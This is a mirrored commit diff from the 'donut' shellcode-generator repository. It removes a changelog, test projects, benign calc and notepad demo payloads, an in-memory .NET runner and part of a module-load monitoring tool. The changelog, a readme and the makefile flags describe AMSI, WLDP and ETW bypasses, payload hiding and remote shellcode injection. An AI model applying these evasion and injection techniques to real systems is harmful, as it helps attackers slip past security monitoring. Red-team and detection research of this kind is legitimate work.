qwqdanchun
/
donut
mirror of https://github.com/qwqdanchun/donut.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

test version

This commit is contained in:
qwqdanchun 2023-04-12 10:39:47 +08:00
parent 61af8ccee3
commit 6f43c3a3c1
69 changed files with 479 additions and 4849 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
CHANGELOG.md
View File

@ -1,55 +0,0 @@
# Changelog
All notable changes to this project will be documented in this file.
## [v1.0]
### Added
* Added module overloading for native PE payloads. Hides them in MEM_IMAGE memory backed by a decoy file on disk
* If donut is set to mutate native PE headers, then for module overloads it will overwrite the payload's PE headers with those of the decoy file to fool some detections of module overloading
* Added an option to block indefinitely after running the payload
* Added Dockerfile to create a docker image for generating donut shellcode
* Added support for binaries without relocation information or with certain edge cases for relocation information
* Added custom GetProcAddress and LoadLibrary replacement functions that will only call those Win32 API calls as fallbacks
* Better documentation for debugging, designing with, and integrating Donut.
* Added moduler bypass system for ETW
* Added option for preserving or overwriting PE headers of native payloads
* Added an inject_local.exe that runs shellcode in the current process for testing purposes
* C# output generator
* Python output generator
* UUID string output generator
### Changed
* The -y switch now uses the value provided as an offset from the base address of the process's executable module. So, for example, if you have injected donut into an infected, legitimate PE file, then once donut completes it will create a thread at the provided offset of that legitimate PE, allowing it to resume its legitimate execution and do what it was supposed to do in the first place.
* Fixed some issues with the MingW makefile (#96)
* Fixed and improved all makefiles
* Fixed the Python module
## [v0.9.3]
### Added
* The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.
* The -z switch tells the builder to compress the input file. 1=none, 2=aPLib. On Windows, a further three algorithms are supported, which are 3=LZNT1, 4=Xpress and 5=Xpress Huffman.
* The -f switch specifies the output format for loader. 1=binary, 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=c# and 8=hex. On Windows, Base64 strings are copied to the clipboard.
* The -t switch tells the loader to run unmanaged entrypoint for EXE as a thread. This also attempts to intercept exit-related API in Import Address Table by replacing their pointers with the address of RtlExitUserThread.
* The -n switch can be used to specify name of module for HTTP staging. If entropy is enabled, this is generated randomly.
* The -s switch specifies the HTTP server to download module from.
* The -y switch tells loader to create a new thread for the loader and continues executing at a specific address or Original Entry Point (OEP). The address should be provided as a string in hexadecimal format.
* The -x switch can be used to specify how loader terminates. 1=exit thread, 2=exit process.
* The -p switch is used to specify parameters to .NET method, DLL function or command line for an unmanaged EXE file. Wrap multiple parameters inside quotations.
* The -w switch tells the loader to convert parameters to UNICODE before passing to unmanaged DLL function.
* C# generator by n1xbyte: https://github.com/n1xbyte/donutCS
* Go generator by awgh https://github.com/Binject/go-donut
### Changed
* Command line is no longer parsed using semi-colon or comma as a token. The -p switch now accepts a string with all parameters enclosed in quotation marks. For .NET DLL/EXE, these are separated by the loader using CommandLineToArgvW. For unmanaged DLL, the string is passed to the DLL function without any modification.
* The -u switch to specify URL for HTTP stager is replaced with -s switch to prepare for a DNS stager.
* The -f switch to specify input file is now used to specify output format of loader.
### Removed
* XSL files are no longer supported.
* Code stub for calling DLL function with multiple arguments.

12
DemoCreateProcess/Class1.cs
View File

@ -1,12 +0,0 @@
using System.Diagnostics;
public class TestClass
{
public static void RunProcess(string path, string path2)
{
System.Console.WriteLine("[STDOUT] Running {0} and {1}...", path, path2);
System.Console.Error.WriteLine("[STDERR] Running {0} and {1}...", path, path2);
Process.Start(path);
Process.Start(path2);
}
}

51
DemoCreateProcess/DemoCreateProcess.csproj
View File

@ -1,51 +0,0 @@
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{75C4A31E-6E99-4289-8701-EF0B6CD94435}</ProjectGuid>
<OutputType>Library</OutputType>
<NoStandardLibraries>false</NoStandardLibraries>
<AssemblyName>DemoCreateProcess</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup>
<RootNamespace>DemoCreateProcess</RootNamespace>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.CSharp" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Data" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="System.Xml" />
<Reference Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="Class1.cs" />
</ItemGroup>
<ItemGroup>
<None Include="Readme.md" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSHARP.Targets" />
<ProjectExtensions>
<VisualStudio AllowExistingFolder="true" />
</ProjectExtensions>
</Project>

25
DemoCreateProcess/DemoCreateProcess.sln
View File

@ -1,25 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "DemoCreateProcess.csproj", "{75C4A31E-6E99-4289-8701-EF0B6CD94435}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.Build.0 = Debug|Any CPU
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.ActiveCfg = Release|Any CPU
{75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3A24F1AC-B24D-4029-9661-05CA11DAFC82}
EndGlobalSection
EndGlobal

36
DemoCreateProcess/Properties/AssemblyInfo.cs
View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("DemoCreateProcess")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("DemoCreateProcess")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

39
DemoCreateProcess/Readme.md
View File

@ -1,39 +0,0 @@
# DemoCreateProcess
A simple C# program to use as a demo for testing shellcode. It takes two program names (such as notepad.exe,calc.exe) as parameters. You may generate shellcode for it using donut:
64-bit:
```
.\donut.exe -i .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
```
32-bit:
```
.\donut.exe -i -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
```
# Building on Linux
This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
To build the project, simply `cd` to its root directory and run:
```
xbuild
```
To build in Release mode, run:
```
xbuild /p:Configuration=Release
```
If receiving errors about missing dependencies, try specifying the targeted .NET version:
```
xbuild /p:TargetFrameworkVersion="v4.5"
```
Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.

16
Dockerfile
View File

@ -1,16 +0,0 @@
FROM ubuntu:22.04
RUN apt-get update
RUN apt-get install --no-install-recommends --no-install-suggests -y \
mingw-w64 zip build-essential perl python3 xml2 pkg-config automake \
libtool autotools-dev make g++ git ruby wget libssl-dev
WORKDIR /opt
RUN git clone https://github.com/TheWover/donut.git
WORKDIR /opt/donut
RUN make -f Makefile
WORKDIR /workdir
RUN chmod ugo+wrx /workdir
RUN ls /opt/donut
ENTRYPOINT ["/opt/donut/donut"]

6
DonutTest/App.config
View File

@ -1,6 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
</startup>
</configuration>

55
DonutTest/DonutTest.csproj
View File

@ -1,55 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>DonutTest</RootNamespace>
<AssemblyName>DonutTest</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

31
DonutTest/DonutTest.sln
View File

@ -1,31 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DonutTest", "DonutTest.csproj", "{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "..\DemoCreateProcess\DemoCreateProcess.csproj", "{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.Build.0 = Release|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {E91D143E-AB90-41D2-942F-D3F1DC8352F3}
EndGlobalSection
EndGlobal

12
DonutTest/Hello.cs
View File

@ -1,12 +0,0 @@
// A Hello World! program in C#.
using System;
namespace HelloWorld
{
class Hello
{
static void Main()
{
Console.WriteLine("Hello World!");
}
}
}

149
DonutTest/Program.cs
View File

File diff suppressed because one or more lines are too long

36
DonutTest/Properties/AssemblyInfo.cs
View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("DonutTest")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("DonutTest")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("3c9a6b88-bed2-4ba8-964c-77ec29bf1846")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

42
DonutTest/Readme.md
View File

@ -1,42 +0,0 @@
# DonutTest
A simple C# shellcode remote injector to use in testing donut. It contains both x86 and x64 versions of the shellcode, determines the architecture of the target process, and then injects the appropriate version into that process with CreateRemoteThread. The shellcode must be Base64-encoded and dropped into the code as a string. This ensures that it can be run entirely from memory.
You may Base64-encode your shellcode and copy it to your clipboard with the PowerShell below:
```powershell
$filename = "C:\\Test\donut\\loader.bin"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
```
```
Usage:
DonutTest.exe [PID]
If no PID is specified, then DonutTest will inject the shellcode into itself.
```
# Building on Linux
This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
To build the project, simply `cd` to its root directory and run:
```
xbuild
```
To build in Release mode, run:
```
xbuild /p:Configuration=Release
```
If receiving errors about missing dependencies, try specifying the targeted .NET version:
```
xbuild /p:TargetFrameworkVersion="v4.5"
```
Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.

5
DonutTest/calc.js
View File

@ -1,5 +0,0 @@
var sh
sh = new ActiveXObject("Wscript.Shell")
sh.Run("calc.exe")
WScript.Quit()

7
DonutTest/calc.vbs
View File

@ -1,7 +0,0 @@
Dim sh
Set sh = CreateObject("Wscript.Shell")
Call sh.Run("calc.exe")
Set sh = Nothing
WScript.Quit()

36
DonutTest/dlltest.c
View File

@ -1,36 +0,0 @@
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#include <windows.h>
#include "donut.h"
#pragma comment(lib, "user32.lib")
__declspec(dllexport)
VOID APIENTRY DonutApiVoid(VOID) {
MessageBoxA(NULL, "Hello, World!", "Donut Test for VOID API", MB_OK);
}
__declspec(dllexport)
VOID APIENTRY DonutApiW(PWCHAR argv) {
MessageBoxW(NULL, argv, L"Donut Test for UNICODE strings", MB_OK);
}
__declspec(dllexport)
VOID APIENTRY DonutApiA(PCHAR argv) {
MessageBoxA(NULL, argv, "Donut Test for ANSI strings", MB_OK);
}
__declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

146
DonutTest/rundotnet.cpp
View File

@ -1,146 +0,0 @@
/**
BSD 3-Clause License
Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <windows.h>
#include <oleauto.h>
#include <mscoree.h>
#include <comdef.h>
#include <cstdio>
#include <cstdint>
#include <cstring>
#include <cstdlib>
#include <sys/stat.h>
#pragma comment(lib, "mscoree.lib")
#import "mscorlib.tlb" raw_interfaces_only
void rundotnet(void *code, size_t len) {
HRESULT hr;
ICorRuntimeHost *icrh;
IUnknownPtr iu;
mscorlib::_AppDomainPtr ad;
mscorlib::_AssemblyPtr as;
mscorlib::_MethodInfoPtr mi;
VARIANT v1, v2;
SAFEARRAY *sa;
SAFEARRAYBOUND sab;
printf("CorBindToRuntime(ICorRuntimeHost).\n");
hr = CorBindToRuntime(
NULL, // load latest runtime version available
NULL, // load workstation build
CLSID_CorRuntimeHost,
IID_ICorRuntimeHost,
(LPVOID*)&icrh);
if(FAILED(hr)) return;
printf("ICorRuntimeHost::Start()\n");
hr = icrh->Start();
if(SUCCEEDED(hr)) {
printf("ICorRuntimeHost::GetDefaultDomain()\n");
hr = icrh->GetDefaultDomain(&iu);
if(SUCCEEDED(hr)) {
printf("IUnknown::QueryInterface()\n");
hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
if(SUCCEEDED(hr)) {
sab.lLbound = 0;
sab.cElements = len;
printf("SafeArrayCreate()\n");
sa = SafeArrayCreate(VT_UI1, 1, &sab);
if(sa != NULL) {
CopyMemory(sa->pvData, code, len);
printf("AppDomain::Load_3()\n");
hr = ad->Load_3(sa, &as);
if(SUCCEEDED(hr)) {
printf("Assembly::get_EntryPoint()\n");
hr = as->get_EntryPoint(&mi);
if(SUCCEEDED(hr)) {
v1.vt = VT_NULL;
v1.plVal = NULL;
printf("MethodInfo::Invoke_3()\n");
hr = mi->Invoke_3(v1, NULL, &v2);
mi->Release();
}
as->Release();
}
SafeArrayDestroy(sa);
}
ad->Release();
}
iu->Release();
}
icrh->Stop();
}
icrh->Release();
}
int main(int argc, char *argv[])
{
void *mem;
struct stat fs;
FILE *fd;
if(argc != 2) {
printf("usage: rundotnet <.NET assembly>\n");
return 0;
}
// 1. get the size of file
stat(argv[1], &fs);
if(fs.st_size == 0) {
printf("file is empty.\n");
return 0;
}
// 2. try open assembly
fd = fopen(argv[1], "rb");
if(fd == NULL) {
printf("unable to open \"%s\".\n", argv[1]);
return 0;
}
// 3. allocate memory
mem = malloc(fs.st_size);
if(mem != NULL) {
// 4. read file into memory
fread(mem, 1, fs.st_size, fd);
// 5. run the program from memory
rundotnet(mem, fs.st_size);
// 6. free memory
free(mem);
}
// 7. close assembly
fclose(fd);
return 0;
}

BIN
DonutTest/rundotnet.exe
View File

Binary file not shown.

1
Makefile.msvc
View File

@ -1,6 +1,7 @@
donut: clean
@echo ###### Building exe2h ######
cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
link -nologo -subsystem:console exe2h.obj mmap-windows.obj
@echo ###### Building loader ######
cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c

1
Makefile_x86.msvc
View File

@ -1,6 +1,7 @@
donut: clean
@echo ###### Building exe2h ######
cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
link -nologo -subsystem:console exe2h.obj mmap-windows.obj
@echo ###### Building loader ######
cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c

29
ModuleMonitor/LICENSE
View File

@ -1,29 +0,0 @@
BSD 3-Clause License
Copyright (c) 2019, TheWover
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

58
ModuleMonitor/ModuleMonitor.csproj
View File

@ -1,58 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{361C69F5-7885-4931-949A-B91EEAB170E3}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>ModuleMonitor</RootNamespace>
<AssemblyName>ModuleMonitor</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<ApplicationManifest>app.manifest</ApplicationManifest>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="app.manifest" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

6
ModuleMonitor/ModuleMonitor.csproj.user
View File

@ -1,6 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>--clr-sentry</StartArguments>
</PropertyGroup>
</Project>

25
ModuleMonitor/ModuleMonitor.sln
View File

@ -1,25 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ModuleMonitor", "ModuleMonitor.csproj", "{361C69F5-7885-4931-949A-B91EEAB170E3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {B18C8887-D713-4379-A365-35C9C89A1C36}
EndGlobalSection
EndGlobal

352
ModuleMonitor/Program.cs
View File

@ -1,352 +0,0 @@
/* Name: ModuleMonitor
*
*
*
*
*
*
*/
using System;
using System.Linq;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
namespace CLRSentry
{
class Program
{
//TODO: Rename projec to ModuleMonitor, and add a --clrssentry option to watch for CLR injection
static void Main(string[] args)
{
if (args.Contains("-h") || args.Contains("--help"))
{
PrintUsage();
Environment.Exit(0);
}
if (args.Contains("--clr-sentry"))
{
CLRSentry();
}
else
{
MonitorModuleLoads();
}
}
/// <summary>
/// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace.
/// </summary>
public static void MonitorModuleLoads()
{
//Monitor without any filters
